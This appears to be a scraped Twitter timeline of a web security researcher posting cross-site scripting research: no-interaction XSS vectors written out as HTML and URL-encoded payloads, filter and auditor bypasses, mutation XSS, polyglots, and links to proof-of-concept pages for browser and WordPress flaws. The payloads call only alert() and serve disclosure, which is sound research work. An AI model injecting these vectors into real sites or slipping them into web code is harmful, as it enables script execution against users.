Tweets
- Tweets
- Tweets & replies
- Media
@kinugawamasato is blocked
Are you sure you want to view these Tweets? Viewing Tweets won't unblock @kinugawamasato.
-
no UI
#XSS vector, inspired by@BenHayak vector :D <div style=writing-mode:tb;overflow:scroll onscroll=alert(1)> https://jsfiddle.net/a7p7okzv/ -
No UI
#XSS vector Edge, MSIE10-11 <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll=alert('xss')>pic.twitter.com/ZHvLVK37qC
-
All passive element XSS on IE are: https://jsfiddle.net/wmo6pr2v/ I was surprised that width/height property brings focus event. cc
@0x6D6172696F -
XSS inside an editable area and can't use contenteditable=false? <a style="-webkit-user-modify: read-only;" href="javascript:alert(1)">CLICK
-
Another no user interaction vector: It works on Chrome/Safari and *Edge*. http://vulnerabledoma.in/char_test?xss=0&body=%3Cdiv%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x%3E#x … http://vulnerabledoma.in/char_test?xss=0&body=%3Cdiv%20style=-webkit-user-modify:read-write-plaintext-only%20onfocus=alert(1)%20id=x%3E#x …
-
全CSSプロパティと値を列挙してユーザ操作不要XSSベクタを洗い出そうとしてるんだけど、早速成果でた!一部をちょっと紹介。(IEで動作) http://vulnerabledoma.in/char_test?xss=0&body=%3Cdiv%20id=%22a%22%20style=-ms-block-progression:bt%20onfocus=alert(1)%3E#a … http://vulnerabledoma.in/char_test?xss=0&body=%3Cdiv%20id=a%20style=-ms-layout-flow:vertical-ideographic%20onfocus=alert(1)%3E#a … http://vulnerabledoma.in/char_test?xss=0&body=%3Cdiv%20id=a%20style=float:left%20onfocus=alert(1)%3E#a …
-
Interesting mutation via createElement('isindex') and ('image') https://vulnerabledoma.in/mxss/isindex.html … https://vulnerabledoma.in/mxss/imagetag.html …
#mXSS -
同様のメッセージが出るCVリストに載ったドメインでもデフォルトで自動的にIEを起動する動作に変更なら、CVリストのドメインのXSSを使って、IE固有のExploitをEdgeからいきなり展開できるようになりそうだ。https://twitter.com/itmedia/status/734602291957895169 …
-
WASM×JS(MSIE)×CSS×HTML Polyglot https://vulnerabledoma.in/polyglot/wasmjscsshtml.html …
-
MSIE Meets WebAssembly! I just wrote WASM × JS polyglot :) https://vulnerabledoma.in/polyglot/wasmjs.html …
-
"Calling alert from WebAssembly (WASM)" - a very simple tutorial to show that WASM isn't as hard as it lookshttps://gist.github.com/cure53/f4581cee76d2445d8bd91f03d4fa7d3b …
-
Blogged! / XSS Auditor bypass using Flash and base tag http://masatokinugawa.l0.cm/2016/05/xss8.html … (日本語) http://mksben.l0.cm/2016/05/xssauditor-bypass-flash-basetag.html … (English)
-
WordPress 4.5.1 XSS & SOME: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c … https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e … Issue was re-found and published, thus the early release.
-
CFP応募開始です。/ 講演者募集 || CALL FOR PAPERS || 世界トップクラスの専門家による情報セキュリティ国際会議「CODE BLUE(コードブルー)」 http://codeblue.jp/2016/cfp/
#codeblue -
Firefox 42 SOP bypass PoC by
@llamakkohttps://github.com/llamakko/CVE-2015-7214 … -
H5SC Mini-Challenge "XSS Metaphor" 5 - The Write-Up https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Mini-Challenge-5 …
#beta -
OTF+SVG allows to read info character by character with only a STYLE injection through XEE & timing https://gist.github.com/cure53/33fff6e38d256909c46a4b1ff9a534f4 …
-
New challenge "The XSS Metaphor" by
@kinugawamasato@filedescriptor & me is out. Have a great and productive week :) https://html5sec.org/minichallenges/5 … -
情報処理~~試験のXSSスペシャリストでCSPバイパス出たってマジか・・・(適当)
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
Masato Kinugawa
Ben Hayak
.mario
Cure53
Yosuke HASEGAWA